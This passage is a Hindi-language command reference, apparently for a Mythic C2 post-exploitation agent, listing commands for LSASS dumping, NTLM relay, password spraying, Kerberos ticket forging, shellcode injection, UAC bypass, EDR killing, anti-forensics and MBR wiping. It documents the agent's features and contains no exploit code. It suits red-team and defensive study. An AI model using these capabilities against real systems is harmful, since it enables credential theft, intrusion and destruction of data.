process-mitigation | `process-mitigation [-action query\|set] [-pid <PID>] [-policy <policy>]` | **(केवल विंडोज)** प्रक्रिया शमन नीतियां क्वेरी या सेट करें (DEP, ASLR, CIG, ACG, CFG). अहस्ताक्षरित DLL लोडिंग को ब्लॉक करने के लिए CIG सेट करें (EDR रक्षा). MITRE T1480.
process-tree | `process-tree [-pid <PID>] [-filter <name>]` | माता-पिता-बाल संबंधों के साथ प्रक्रिया पदानुक्रम को ट्री के रूप में प्रदर्शित करें। इंजेक्शन लक्ष्य और सुरक्षा उपकरणों की पहचान करने में मदद करता है। क्रॉस-प्लेटफ़ॉर्म (T1057)।
procdump | `procdump [-action lsass\|dump\|search] [-pid <PID>]` | प्रक्रिया मेमोरी डंप करें। विंडोज: LSASS ऑटो-डिस्कवरी के साथ MiniDumpWriteDump. लिनक्स: /proc/pid/mem क्षेत्र डंपिंग. खोज क्रिया क्रेडेंशियल-धारण करने वाली प्रक्रियाएं ढूंढती है। Mythic पर अपलोड करता है और डिस्क से साफ़ करता है। MITRE T1003.001, T1003.007.
proxy-check | `proxy-check [-test_url <URL>]` | पर्यावरण चर, OS कॉन्फ़िग (रजिस्ट्री, कॉन्फ़िग फ़ाइलें), और Go ट्रांसपोर्ट से प्रॉक्सी सेटिंग्स का पता लगाएं। वैकल्पिक कनेक्टिविटी परीक्षण। क्रॉस-प्लेटफ़ॉर्म (T1016)।
ps | `ps [-filter <name>] [-pid <PID>] [-ppid <PPID>] [-user <name>] [-v]` | Mythic प्रक्रिया ब्राउज़र एकीकरण के साथ चल रही प्रक्रियाओं को सूचीबद्ध करें। नाम, PID, अभिभावक PID या उपयोगकर्ता नाम द्वारा फ़िल्टर करें। क्रॉस-प्लेटफ़ॉर्म।
ptrace-inject | `ptrace-inject -action <check\|inject> [-pid <PID>] [-filename <shellcode>] [-restore <true>] [-timeout <30>]` | **(केवल लिनक्स, amd64/arm64)** ptrace के माध्यम से प्रक्रिया इंजेक्शन — PTRACE_ATTACH/POKETEXT/SETREGS रजिस्टर और कोड रीस्टोर के साथ. Yama ptrace_scope प्री-चेक कार्रवाई योग्य मार्गदर्शन के साथ. चेक मोड ptrace_scope, क्षमताएं और उम्मीदवार रिपोर्ट करता है (T1055.008)।
pty | `pty [-shell /bin/bash] [-rows 24] [-cols 80]` | **(लिनक्स/मैकओएस)** Mythic के इंटरैक्टिव टास्किंग के माध्यम से एक इंटरैक्टिव PTY शेल सत्र शुरू करें। द्विदिश I/O के साथ पूर्ण टर्मिनल एमुलेशन (T1059)।
pwd | `pwd` | वर्तमान कार्यशील निर्देशिका प्रिंट करें।
read-memory | `read-memory <dll_name> <function_name> <start_index> <num_bytes>` | **(केवल विंडोज)** एक DLL फ़ंक्शन पते से बाइट्स पढ़ें।
reg | `reg -action <read\|write\|delete\|search\|save\|creds> [-hive HKLM] [-path ...] [...]` | **(केवल विंडोज)** एकीकृत रजिस्ट्री संचालन — पढ़ें, लिखें, हटाएं, खोजें और हाइव सहेजें (T1012, T1112, T1003.002)।
remote-reg | `remote-reg -action <query\|enum\|set\|delete> -server <host> -username <user> [-password <pass>\|-hash <NT>] [-hive HKLM] [-path ...] [-name <val>]` | SMB नेम्ड पाइप पर WinReg RPC के माध्यम से रिमोट विंडोज होस्ट पर रजिस्ट्री पढ़ें/लिखें। पास-द-हैश का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म (T1012, T1112, T1021.002)।
remote-service | `remote-service -action <list\|query\|create\|start\|stop\|delete\|modify-path\|trigger\|dll-sideload> -server <host> -username <user> [-password <pass>\|-hash <NT>] [-name <svc>] [-binpath <path>]` | SVCCTL RPC के माध्यम से रिमोट विंडोज होस्ट पर सेवाएं प्रबंधित करें। मानक संचालन + उन्नत पार्श्व आंदोलन: modify-path (मौजूदा सेवा binpath हाइजैक), trigger (ट्रिगर-स्टार्टेड सेवा बनाएं), dll-sideload (ServiceDll रजिस्ट्री हाइजैक). पास-द-हैश. क्रॉस-प्लेटफ़ॉर्म (T1569.002, T1543.003, T1574.001)।
rev2self | `rev2self` | **(केवल विंडोज)** किसी भी सक्रिय प्रतिरूपण टोकन को छोड़ कर मूल सुरक्षा संदर्भ में वापस जाएं।
route | `route [-destination <IP>] [-gateway <IP>] [-interface <name>]` | वैकल्पिक फ़िल्टरिंग के साथ सिस्टम रूटिंग तालिका प्रदर्शित करें। विंडोज: GetIpForwardTable API, लिनक्स: /proc/net/route + IPv6, macOS: netstat -rn. क्रॉस-प्लेटफ़ॉर्म (T1016)।
rpfwd | `rpfwd start <port> <remote_ip> <remote_port>` / `rpfwd forward <port> <target_ip> <target_port> [bind_addr]` / `rpfwd stop <port>` | पोर्ट फ़ॉरवर्डिंग: रिवर्स (Mythic लक्ष्य पर रूट करता है) या फ़ॉरवर्ड (एजेंट आंतरिक लक्ष्य पर रिले करता है)। क्रॉस-प्लेटफ़ॉर्म (T1090)।
rm | `rm [-path <path>] [-secure true]` | कोई फ़ाइल या निर्देशिका हटाएं। `-secure true` फोरेंसिक पुनर्प्राप्ति को रोकने के लिए हटाने से पहले यादृच्छिक डेटा (3 पास) के साथ ओवरराइट करता है (T1070.004)।
run | `run <command>` | एक शेल कमांड निष्पादित करें और आउटपुट लौटाएं।
runas | `runas -command <cmd> -username <user> -password <pass> [-domain <domain>] [-netonly true]` | किसी भिन्न उपयोगकर्ता के रूप में एक कमांड निष्पादित करें। विंडोज: CreateProcessWithLogonW (/netonly समर्थन करता है). लिनक्स/macOS: रूट के रूप में setuid, या पासवर्ड के साथ sudo -S. क्रॉस-प्लेटफ़ॉर्म (T1134.002)।
schtask | `schtask -action <create\|query\|delete\|run\|list\|enable\|disable\|stop> -name <name> [-program <path>] [-trigger <type>] [-filter <substring>]` | निर्धारित कार्य प्रबंधित करें। विंडोज: टास्क शेड्यूलर COM API. लिनक्स: crontab, systemd टाइमर, at नौकरियां. macOS: LaunchAgents/LaunchDaemons, crontab, at. क्रॉस-प्लेटफ़ॉर्म (T1053)।
screenshot | `screenshot [-action single\|record] [-interval <sec>] [-duration <sec>] [-max_frames <n>]` | एकल स्क्रीनशॉट कैप्चर करें या अंतराल पर लगातार स्क्रीनशॉट रिकॉर्ड करें। PNG के रूप में अपलोड करता है। रिकॉर्ड मोड: कॉन्फ़िगरेबल इंटरवल/अवधि/अधिकतम फ्रेम, jobkill के माध्यम से रोकने योग्य। विंडोज: GDI. macOS: स्क्रीनकैप्चर. लिनक्स: X11/Wayland ऑटो-डिटेक्ट. क्रॉस-प्लेटफ़ॉर्म (T1113)।
secret-scan | `secret-scan [-path /home/user] [-depth 5] [-max_results 100]` | रहस्यों, API कुंजी, निजी कुंजी, कनेक्शन स्ट्रिंग और संवेदनशील पैटर्न के लिए फ़ाइलें खोजें। 42 रीजेक्स पैटर्न (AWS, GitHub, Slack, Stripe, Vault, DigitalOcean, Shopify, Databricks, New Relic, PagerDuty, Okta, Sentry, Datadog, CircleCI आदि) मूल्य रिडक्शन के साथ। गहराई-सीमित निर्देशिका चलना, शोर निर्देशिकाओं को छोड़ता है। क्रॉस-प्लेटफ़ॉर्म (T1552.001, T1005)।
secure-delete | `secure-delete [-action delete\|wipe\|wipe-mbr] -path <file_or_device> [-passes <n>] [-confirm DESTROY]` | फ़ाइलों को सुरक्षित रूप से हटाएं, डेटा मिटाएं या बूट रिकॉर्ड नष्ट करें। `delete`: यादृच्छिक ओवरराइट + हटाना। `wipe`: आक्रामक पैटर्न विनाश (T1485). `wipe-mbr`: कच्चे डिस्क डिवाइस पर MBR/GPT बूट रिकॉर्ड ओवरराइट करें (T1561). सुरक्षा गेट आवश्यक। क्रॉस-प्लेटफ़ॉर्म (T1070.004, T1485, T1561)।
security-info | `security-info [-action all\|edr\|minifilter-enum\|kernel-drivers]` | सुरक्षा स्थिति और सक्रिय नियंत्रण रिपोर्ट करें, EDR/XDR उत्पादों का पता लगाएं (20+ विक्रेता), EDR वर्गीकरण के साथ मिनीफ़िल्टर ड्राइवर गणना करें, या EDR/कॉलबैक विश्लेषण के साथ लोडेड कर्नेल ड्राइवर सूचीबद्ध करें। SELinux/AppArmor/seccomp/ASLR (लिनक्स), SIP/Gatekeeper/FileVault (macOS), Defender/UAC/Credential Guard/BitLocker (विंडोज). क्रॉस-प्लेटफ़ॉर्म (T1082, T1518.001)।
sniff | `sniff [-action capture\|poison\|relay\|ldap-relay] [-interface eth0] [-duration 30] [-response_ip <target>] [-protocols llmnr,nbtns,mdns] [-ports listen:target]` | नेटवर्क स्निफिंग, विषाक्तता और NTLM रिले। `capture`: निष्क्रिय क्रेडेंशियल निष्कर्षण (HTTP, FTP, NTLM, Kerberos, LDAP, SMTP AUTH, Telnet). `poison`: हैश कैप्चर के साथ सक्रिय रिस्पॉन्डर — हैशकैट मोड 5600 में NTLMv2 हैश। `relay`: लक्ष्य SMB के लिए NTLM रिले। `ldap-relay`: पोस्ट-प्रमाणीकरण संचालन (whoami, add-computer, RBCD, dump-laps) के साथ लक्ष्य LDAP के लिए NTLM रिले (T1040, T1557.001)।
share-hunt | `share-hunt -hosts <IPs/CIDRs> -username <DOMAIN\user> -password <pass> [-hash <NTLM>] [-depth <n>] [-filter <all\|credentials\|configs\|code>]` | संवेदनशील फ़ाइलों — क्रेडेंशियल, कॉन्फ़िग, स्क्रिप्ट — के लिए कई होस्टों पर SMB शेयर क्रॉल करें। पास-द-हैश समर्थन के साथ पुनरावर्ती निर्देशिका खोज। क्रॉस-प्लेटफ़ॉर्म (T1135, T1039)।
smb | `smb -action <shares\|ls\|cat\|upload\|rm\|mkdir\|mv\|push\|exfil\|taint\|share-perms\|share-spider\|share-search> -host <target> -username <user> [-password <pass>] [-hash <NT hash>] [-share <name>] [-path <path>] [-depth <n>] [-extensions <.docx,.xlsx>] [-patterns <*.kdbx,web.config>] [-max_results <n>]` | रिमोट शेयरों पर SMB2 फ़ाइल संचालन — सूचीबद्ध करें, ब्राउज़ करें, पढ़ें/लिखें/हटाएं, पार्श्व उपकरण स्थानांतरण के लिए पुश करें, डेटा एक्सफिल्ट्रेशन के लिए एक्सफिल करें, फ़ाइलें रोपने के लिए टैंट करें। **share-perms**: सभी शेयरों पर पढ़ने/लिखने की पहुंच का परीक्षण करें। **share-spider**: गहराई/एक्सटेंशन फ़िल्टर के साथ पुनरावर्ती निर्देशिका सूचीकरण। **share-search**: अंतर्निहित या कस्टम पैटर्न का उपयोग करके शेयरों में संवेदनशील फ़ाइलें खोजें। NTLM प्रमाणीकरण + पास-द-हैश. क्रॉस-प्लेटफ़ॉर्म (T1021.002, T1039, T1080, T1135, T1550.002, T1570, T1048.003)।
service | `service -action <query\|start\|stop\|restart\|create\|delete\|list\|enable\|disable\|edr-enum\|edr-kill> -name <name> [-binpath <path>] [-confirm EDR-KILL]` | **(विंडोज, लिनक्स, मैकओएस)** सेवाएं प्रबंधित करें + EDR/AV लक्ष्यीकरण। `edr-enum`: स्थापित सुरक्षा सेवाओं का पता लगाएं (60+ हस्ताक्षर). `edr-kill`: पता लगाए गए EDR को रोकें+अक्षम करें (सुरक्षा गेट आवश्यक). विंडोज SCM, लिनक्स systemd, macOS launchd (T1543, T1489, T1562.001)।
setenv | `setenv -action <set\|unset> -name <NAME> [-value <VALUE>]` | एजेंट प्रक्रिया में पर्यावरण चर सेट या अनसेट करें। क्रॉस-प्लेटफ़ॉर्म।
shell-config | `shell-config -action <history\|list\|read\|inject\|remove\|clear> [-file <.bashrc>] [-line <cmd>] [-lines <count>]` | शेल हिस्ट्री पढ़ें, शेल कॉन्फ़िग फ़ाइलें सूचीबद्ध/पढ़ें/इंजेक्ट/हटाएं/साफ़ करें। लिनक्स/macOS: bashrc/zshrc. विंडोज: PowerShell प्रोफ़ाइल + PSReadLine हिस्ट्री। T1546.004/T1546.013/T1552.003/T1070.003.
sleep | `sleep [seconds] [jitter] [working_start] [working_end] [working_days]` or `sleep -interval 60 -jitter 30 -jitter_profile normal` | कॉलबैक अंतराल, जिटर, कार्य घंटे और जिटर वितरण प्रोफ़ाइल (uniform/normal/exponential) सेट करें। सामान्य वितरण अंतराल के पास क्लस्टर करता है; घातीय बर्स्टी मानव पैटर्न का अनुकरण करता है।
socks | `socks <start\|stop\|stats\|bandwidth> [port] [-bandwidth_kbs N]` | SOCKS5 प्रॉक्सी शुरू करें, रोकें, आँकड़े देखें या बैंडविड्थ सेट करें। प्रॉक्सी के माध्यम से DNS/UDP उपकरणों के लिए TCP CONNECT और UDP ASSOCIATE (RFC 1928) रिले का समर्थन करता है। वैकल्पिक प्रति-कनेक्शन बैंडविड्थ सीमा KB/s में। आँकड़े सक्रिय कनेक्शन, बाइट TX/RX, हाल का इतिहास दिखाते हैं।
sort | `sort -path <file> [-reverse true] [-numeric true] [-unique true]` | फ़ाइल की पंक्तियों को क्रमबद्ध करें। वर्णमाला, संख्यात्मक, उल्टा और अद्वितीय मोड का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म (T1083)।
spawn | `spawn -path <exe> [-ppid <pid>] [-blockdlls true]` | **(केवल विंडोज)** इंजेक्शन के लिए एक निलंबित प्रक्रिया या थ्रेड स्पॉन करें। PPID स्पूफिंग (T1134.004) और गैर-माइक्रोसॉफ्ट DLL ब्लॉकिंग का समर्थन करता है।
spray | `spray -action <kerberos\|ldap\|smb> -server <DC> -domain <DOMAIN> -users <user1\nuser2> [-password <pass>] [-hash <NT hash>] [-delay <ms>] [-jitter <0-100>]` | केर्बेरोस प्री-प्रमाणीकरण, LDAP बाइंड या SMB प्रमाणीकरण के माध्यम से AD के विरुद्ध पासवर्ड स्प्रे। SMB पास-द-हैश का समर्थन करता है। लॉकआउट-जागरूक कॉन्फ़िगरेबल देरी/जिटर के साथ। क्रॉस-प्लेटफ़ॉर्म (T1110.003, T1550.002)।
ssh | `ssh [-action exec\|push\|check\|tunnel-local\|tunnel-remote\|tunnel-dynamic\|tunnel-list\|tunnel-stop] -host <target> -username <user> [-password <pass>] [-key_path <path>] [-command <cmd>] [-local_port <port>] [-remote_host <host>] [-remote_port <port>]` | कमांड निष्पादित करें, फ़ाइलें पुश करें, या SSH सुरंगें बनाएं। `check` SSH पूर्वापेक्षाएँ मान्य करता है (पोर्ट, प्रमाणीकरण, शेल). tunnel-local (-L), tunnel-remote (-R), tunnel-dynamic (-D SOCKS5). क्रॉस-प्लेटफ़ॉर्म (T1021.004, T1570, T1572)।
ssh-agent | `ssh-agent [-action <list\|enum>] [-socket /path/to/agent.sock]` | **(लिनक्स/मैकओएस केवल)** SSH एजेंट सॉकेट गणना करें और लोडेड कुंजियाँ सूचीबद्ध करें। SSH_AUTH_SOCK खोजता है, /tmp/ssh-*, /run/user/*, GNOME कीरिंग स्कैन करता है। क्रेडेंशियल वॉल्ट को कुंजी फिंगरप्रिंट रिपोर्ट करता है (T1552.004)।
ssh-keys | `ssh-keys -action <list\|add\|remove\|read-private\|enumerate\|generate\|find-reachable\|try-keys\|auto-move> [-key <ssh_key>] [-user <username>] [-targets <range>] [-host <ip>] [-username <user>] [-command <cmd>]` | SSH कुंजी प्रबंधन और पार्श्व आंदोलन स्वचालन। authorized_keys पढ़ें/इंजेक्ट करें, निजी कुंजी पढ़ें, कुंजी जोड़े उत्पन्न करें, SSH कॉन्फ़िग गणना करें। पार्श्व आंदोलन: find-reachable (सबनेट स्कैन), try-keys (कुंजी परीक्षण), auto-move (चेन स्कैन→प्रमाणीकरण→एक्सेक). विंडोज: PuTTY सत्र/रजिस्ट्री, .ppk कुंजी, WSL, OpenSSH, Git SSH कॉन्फ़िग. क्रॉस-प्लेटफ़ॉर्म (T1552.004, T1552.002, T1098.004, T1021.004, T1046)।
stat | `stat -path <file_or_dir>` | फ़ाइल/निर्देशिका मेटाडेटा प्रदर्शित करें: प्रकार, आकार, अनुमतियाँ, टाइमस्टैम्प। प्लेटफ़ॉर्म-विशिष्ट विवरण — inode/स्वामी (लिनक्स/मैकओएस), फ़ाइल विशेषताएँ (विंडोज). Lstat के माध्यम से सिमलिंक-जागरूक। क्रॉस-प्लेटफ़ॉर्म (T1083)।
strings | `strings -path <file> [-min_length <n>] [-pattern <text>] [-offset <bytes>] [-max_size <bytes>]` | फ़ाइलों से मुद्रण योग्य ASCII स्ट्रिंग निकालें। बाइनरी में एम्बेडेड टेक्स्ट, URL, क्रेडेंशियल खोजें। पैटर्न फ़िल्टर, न्यूनतम लंबाई नियंत्रण, ऑफ़सेट/अधिकतम आकार। क्रॉस-प्लेटफ़ॉर्म (T1005)।
start-clr | `start-clr [-action execute-assembly -assembly <b64> -arguments <args>]` | **(केवल विंडोज)** CLR v4 आरंभ करें या .NET असेंबली निष्पादित करें। `execute-assembly` क्रिया एक चरण में AMSI+ETW ऑटो-पैच करती है और असेंबली चलाती है (CS execute-assembly की तरह). बारीक नियंत्रण के लिए -amsi_patch/-etw_patch के साथ मैन्युअल मोड।
systemd-persist | `systemd-persist -action <install\|remove\|list> -name <unit> [-exec_start <cmd>] [-timer <calendar>] [-system true]` | **(केवल लिनक्स)** systemd सेवा/टाइमर स्थिरता स्थापित करें, हटाएं या सूचीबद्ध करें। उपयोगकर्ता या सिस्टम स्कोप। MITRE T1543.002.
steal-token | `steal-token -pid <pid> [-action spawn -command <cmd>]` | **(केवल विंडोज)** किसी अन्य प्रक्रिया से टोकन चुराएं: इसे प्रतिरूपित करें, या इसके साथ एक प्रक्रिया स्पॉन करें (T1134.002)।
token-store | `token-store -action <save\|list\|use\|remove\|history> -name <label>` | **(केवल विंडोज)** नामित टोकन वॉल्ट — सहेजें, सूचीबद्ध करें, पुनर्स्थापित करें, हटाएं और पहचान संक्रमण इतिहास देखें। पुनः चोरी किए बिना चुराए गए/बनाए गए पहचानों के बीच त्वरित स्विचिंग सक्षम करता है (T1134.001)।
suspend | `suspend -action <suspend\|resume> -pid <PID>` | एक प्रक्रिया को निलंबित या पुनर्स्थापित करें। संवेदनशील संचालन के दौरान सामरिक EDR/AV विराम। विंडोज: NtSuspendProcess/NtResumeProcess. लिनक्स/macOS: SIGSTOP/SIGCONT. क्रॉस-प्लेटफ़ॉर्म (T1562.001)।
sysinfo | `sysinfo [-action info\|full-profile]` | व्यापक सिस्टम जानकारी: OS संस्करण, हार्डवेयर, मेमोरी, अपटाइम, डोमेन, .NET (विंडोज), SELinux/SIP स्थिति। `full-profile` स्वचालित 5-चरण होस्ट प्रोफाइलिंग श्रृंखला चलाता है (sysinfo → ps → security-info → privesc-check → persist-enum). क्रॉस-प्लेटफ़ॉर्म (T1082)।
sysmon-config | `sysmon-config [-action check\|rules\|events]` | **(केवल विंडोज)** Sysmon स्थापना का पता लगाएं और कॉन्फ़िगरेशन निकालें — सेवा/ड्राइवर स्थिति, हैश एल्गोरिथम, विकल्प फ़्लैग, नियम डेटा आकार, ईवेंट चैनल। मिनीफ़िल्टर ऊंचाई के माध्यम से नाम बदली गई स्थापनाओं का पता लगाता है (T1518.001, T1562.001)।
tac | `tac -path <file>` | फ़ाइल पंक्तियों को उल्टे क्रम में प्रिंट करें। नवीनतम-से-सबसे पुराने लॉग देखने के लिए उपयोगी। क्रॉस-प्लेटफ़ॉर्म (T1083)।
tail | `tail -path <file> [-lines <N>] [-head true] [-bytes <N>]` | पूरी सामग्री स्थानांतरित किए बिना फ़ाइल की पहली या अंतिम N पंक्तियाँ/बाइट्स पढ़ें। कुशल टेल के लिए रिंग बफ़र, बड़ी फ़ाइलों के लिए रिवर्स-सीक। क्रॉस-प्लेटफ़ॉर्म (T1005, T1083)।
tcc-check | `tcc-check [-service <filter>]` | **(केवल मैकओएस)** TCC (पारदर्शिता, सहमति और नियंत्रण) अनुमतियाँ गणना करें। पता लगाएं कि किन ऐप्स में कैमरा, माइक्रोफोन, स्क्रीन रिकॉर्डिंग, पूर्ण डिस्क पहुंच है। अनुमत सारांश के साथ सेवा द्वारा समूहित करता है (T1082)।
touch | `touch -path <file> [-mkdir true]` | एक खाली फ़ाइल बनाएं या मौजूदा फ़ाइल टाइमस्टैम्प अपडेट करें। वैकल्पिक अभिभावक निर्देशिका निर्माण। क्रॉस-प्लेटफ़ॉर्म (T1106)।
thread-hijack | `thread-hijack -pid <PID> [-tid <TID>]` | **(विंडोज, मैकओएस)** थ्रेड निष्पादन हाइजैकिंग के माध्यम से शेलकोड इंजेक्ट करें — मौजूदा थ्रेड को निलंबित करें, PC/RIP को शेलकोड पर रीडायरेक्ट करें, फिर से शुरू करें। macOS Mach APIs (task_for_pid + thread_get/set_state) का उपयोग करता है, रूट आवश्यक (T1055.003)।
threadless-inject | `threadless-inject` | **(केवल विंडोज)** एक रिमोट प्रक्रिया में DLL फ़ंक्शन को हुक करके थ्रेडलेस इंजेक्शन का उपयोग करके शेलकोड इंजेक्ट करें। वैनिला इंजेक्शन की तुलना में अधिक गुप्त क्योंकि यह नए थ्रेड नहीं बनाता है।
ticket | `ticket -action forge\|request\|diamond\|renew\|s4u\|pkinit -realm <DOMAIN> -username <user> -key <hex_key> [-key_type aes256\|aes128\|rc4] [-format kirbi\|ccache] [-domain_sid <SID>] [-spn <SPN>] [-server <KDC>] [-impersonate <user>] [-krbtgt_key <hex>] [-target_user <user>] [-ticket <base64>] [-certificate <pem>] [-private_key <pem>]` | केर्बेरोस टिकट बनाएं, अनुरोध करें, नवीनीकृत करें, प्रतिनिधि या प्रमाणपत्र-प्रमाणीकरण करें। Forge: गोल्डन/सिल्वर टिकट (ऑफ़लाइन). Request: ओवरपास-द-हैश (ऑनलाइन). Diamond: चोरी से बचने के लिए वास्तविक AS एक्सचेंज + टिकट संशोधन। Renew: TGT जीवनकाल बढ़ाएं। S4U: S4U2Self+S4U2Proxy के माध्यम से नियंत्रित प्रतिनिधिमंडल। PKINIT: ADCS/शैडो क्रेड्स से प्रमाणपत्र-आधारित प्रमाणीकरण। क्रॉस-प्लेटफ़ॉर्म (T1558.001, T1558.002, T1550.002, T1134.001, T1649)।
tr | `tr -path <file> -from [:lower:] -to [:upper:]` | फ़ाइल सामग्री में वर्णों का अनुवाद, संपीड़न या विलोपन करें। वर्ण वर्गों और श्रेणियों का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म (T1083)।
triage | `triage -action <all\|documents\|credentials\|configs\|database\|scripts\|archives\|mail\|recent\|custom\|recon-chain> [-path <dir>] [-hours <n>] [-target <subnet>] [-username <user>] [-password <pass>]` | एक्सफिल्ट्रेशन के लिए उच्च-मूल्य वाली फ़ाइलें खोजें — दस्तावेज़, क्रेडेंशियल, कॉन्फ़िग, डेटाबेस (.db/.sqlite), स्क्रिप्ट (.py/.sh/.ps1), आर्काइव (.zip/.tar/.7z), ईमेल फ़ाइलें (.pst/.eml/.mbox), हाल ही में संशोधित फ़ाइलें, या कस्टम पथ स्कैन। **recon-chain**: स्वचालित उपकार्य श्रृंखला — पोर्टस्कैन → SMB शेयर गणना → शेयर हंट → स्थानीय ट्राइएज (लक्ष्य, उपयोगकर्ता नाम/पासवर्ड आवश्यक). क्रॉस-प्लेटफ़ॉर्म (T1083, T1005)।
trust | `trust -server <DC> -username <user@domain> -password <pass> [-use_tls]` | LDAP के माध्यम से डोमेन/फ़ॉरेस्ट ट्रस्ट गणना करें जिसमें फ़ॉरेस्ट टोपोलॉजी, ट्रांज़िटिविटी विश्लेषण, एन्क्रिप्शन शक्ति और हमला पथ पहचान शामिल है। क्रॉस-प्लेटफ़ॉर्म (T1482)।
timestomp | `timestomp -action <get\|copy\|set\|match\|random\|clean-prefetch> -target <file> [-source <file>] [-timestamp <time>]` | फ़ाइल टाइमस्टैम्प को मिलाने के लिए संशोधित करें। प्राप्त करें, किसी अन्य फ़ाइल से कॉपी करें, विशिष्ट समय सेट करें, निर्देशिका पड़ोसियों से मिलान करें (IQR), या सीमा के भीतर यादृच्छिक। `clean-prefetch` नामित निष्पादन योग्य के लिए विंडोज प्रीफ़ेच फ़ाइलें हटाता है। विंडोज निर्माण समय भी संशोधित करता है।
tscon | `tscon [-action <list\|hijack\|disconnect\|logoff>] [-session_id <id>]` | **(केवल विंडोज)** RDP सत्र प्रबंधन — सूचीबद्ध करें, हाइजैक करें, डिस्कनेक्ट करें या लॉग ऑफ करें। बिना क्रेडेंशियल के सत्र अधिग्रहण (T1563.002)।
ts | `ts [-a] [-i PID]` | **(केवल विंडोज)** प्रक्रियाओं में थ्रेड सूचीबद्ध करें। डिफ़ॉल्ट रूप से केवल सतर्क थ्रेड (Suspended/DelayExecution) दिखाता है। सभी थ्रेड के लिए -a, PID द्वारा फ़िल्टर करने के लिए -i (T1057)।
uac-bypass | `uac-bypass [-technique fodhelper\|computerdefaults\|sdclt\|eventvwr\|silentcleanup\|cmstp\|dismhost\|wusa] [-command <path>]` | **(केवल विंडोज)** मध्यम से उच्च अखंडता तक बढ़ाने के लिए UAC बाईपास करें। 8 तकनीकें: रजिस्ट्री हाइजैक, env var हाइजैक, INF फ़ाइल दुरुपयोग, COM CLSID हाइजैक, नकली विश्वसनीय निर्देशिका। डिफ़ॉल्ट उन्नत कॉलबैक स्पॉन करता है (T1548.002, T1218.003)।
uniq | `uniq -path <file> [-count true] [-duplicate true] [-unique_only true]` | फ़ाइल में डुप्लिकेट लगातार पंक्तियों को फ़िल्टर या गिनें। काउंट मोड आवृत्ति द्वारा क्रमबद्ध करता है। क्रॉस-प्लेटफ़ॉर्म (T1083)।
unlink | `unlink -connection_id <uuid>` | एक लिंक किए गए P2P एजेंट (TCP या नेम्ड पाइप) को डिस्कनेक्ट करें। क्रॉस-प्लेटफ़ॉर्म (T1572)।
uptime | `uptime` | सिस्टम अपटाइम, बूट समय और लोड औसत दिखाएं। क्रॉस-प्लेटफ़ॉर्म (T1082)।
upload | `upload` | चंक्ड फ़ाइल स्थानांतरण के साथ लक्ष्य पर एक फ़ाइल अपलोड करें। gzip फ़ाइलों के स्वचालित डीकंप्रेसन का समर्थन करता है। SHA256 हैश सत्यापन।
usn-jrnl | `usn-jrnl -action query\|recent\|delete [-volume C:]` | **(केवल विंडोज)** NTFS USN चेंज जर्नल क्वेरी या हटाएं — एंटी-फोरेंसिक्स के लिए फ़ाइल संचालन इतिहास नष्ट करता है (T1070.004)।
vanilla-injection | `vanilla-injection -action <inject\|migrate\|ldpreload> -pid <PID>` | एक रिमोट प्रक्रिया में शेलकोड इंजेक्ट करें (inject), एजेंट माइग्रेट करें (migrate: inject + exit), या LD_PRELOAD .so के साथ नई प्रक्रिया स्पॉन करें (ldpreload: केवल लिनक्स, कोई ptrace नहीं, Yama को बायपास करता है). **विंडोज:** VirtualAllocEx/WriteProcessMemory/CreateRemoteThread. **लिनक्स (amd64/arm64):** /proc/PID/mem डायरेक्ट राइट, memfd के माध्यम से LD_PRELOAD. T1055.001, T1055.009, T1574.006.
vm-detect | `vm-detect [-action detect\|sandbox]` | VM/हाइपरवाइजर वातावरण का पता लगाएं या सैंडबॉक्स चोरी का विश्लेषण करें। `detect`: MAC OUI, DMI/SMBIOS, VM टूल, SCSI, CPU हाइपरवाइजर फ़्लैग. `sandbox`: स्कोर किया गया विश्लेषण — CPU गणना, RAM, डिस्क, अपटाइम, स्लीप टाइमिंग, होस्टनाम, प्रक्रिया गणना, उपयोगकर्ता नाम. क्रॉस-प्लेटफ़ॉर्म (T1497, T1497.001)।
vss | `vss -action <list\|create\|delete\|delete-all\|extract\|inhibit-recovery\|shutdown\|reboot> [-volume C:\\] [-id <id>] [-confirm true]` | प्रभाव तकनीकें: VSS प्रबंधन (विंडोज), पुनर्प्राप्ति निषेध (T1490), शटडाउन/रीबूट (T1529, क्रॉस-प्लेटफ़ॉर्म). विनाशकारी क्रियाओं के लिए -confirm true आवश्यक है। MITRE T1003.003, T1490, T1529.
watch-dir | `watch-dir -path <dir> [-interval 5] [-duration 300] [-depth 3] [-pattern *.docx] [-hash true]` | फ़ाइल सिस्टम परिवर्तनों के लिए एक निर्देशिका की निगरानी करें — पोलिंग के माध्यम से नई, संशोधित और हटाई गई फ़ाइलों का पता लगाता है। ग्लोब फ़िल्टरिंग और MD5 हैश डिटेक्शन का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म (T1083, T1119)।
wc | `wc -path <file_or_dir> [-pattern <glob>]` | फ़ाइलों में पंक्तियाँ, शब्द, वर्ण और बाइट्स गिनें। ग्लोब पैटर्न फ़िल्टरिंग और योग के साथ निर्देशिका मोड। क्रॉस-प्लेटफ़ॉर्म (T1083)।
wdigest | `wdigest -action <status\|enable\|disable>` | **(केवल विंडोज)** WDigest प्लेनटेक्स्ट क्रेडेंशियल कैशिंग प्रबंधित करें। अगले लॉगऑन पर स्पष्ट पाठ पासवर्ड कैप्चर करने के लिए सक्षम करें। MITRE T1003.001, T1112.
winrm | `winrm -host <target> -username <user> [-password <pass>] [-hash <NT hash>] -command <cmd> [-shell cmd\|powershell] [-auto-verify]` or `winrm -action check -host <target> [-username <user> -password <pass>]` | NTLM प्रमाणीकरण के साथ WinRM के माध्यम से रिमोट विंडोज होस्ट पर कमांड निष्पादित करें। पास-द-हैश, cmd.exe और PowerShell का समर्थन करता है। `check` WinRM पूर्वापेक्षाएँ मान्य करता है (पोर्ट 5985/5986, प्रमाणीकरण, शेल). क्रॉस-प्लेटफ़ॉर्म (T1021.006, T1550.002)।
windows | `windows [-action list\|search] [-filter <string>] [-all]` | **(केवल विंडोज)** दृश्यमान एप्लिकेशन विंडो गणना करें — HWND, PID, प्रक्रिया नाम, विंडो क्लास और शीर्षक दिखाता है। शीर्षक/प्रक्रिया/क्लास द्वारा खोज फ़िल्टर। MITRE T1010.
who | `who [-all true]` | वर्तमान में लॉग इन उपयोगकर्ताओं और सक्रिय सत्रों को दिखाएं। लिनक्स: utmp पार्स करता है। विंडोज: WTS API. macOS: who कमांड. क्रॉस-प्लेटफ़ॉर्म (T1033)।
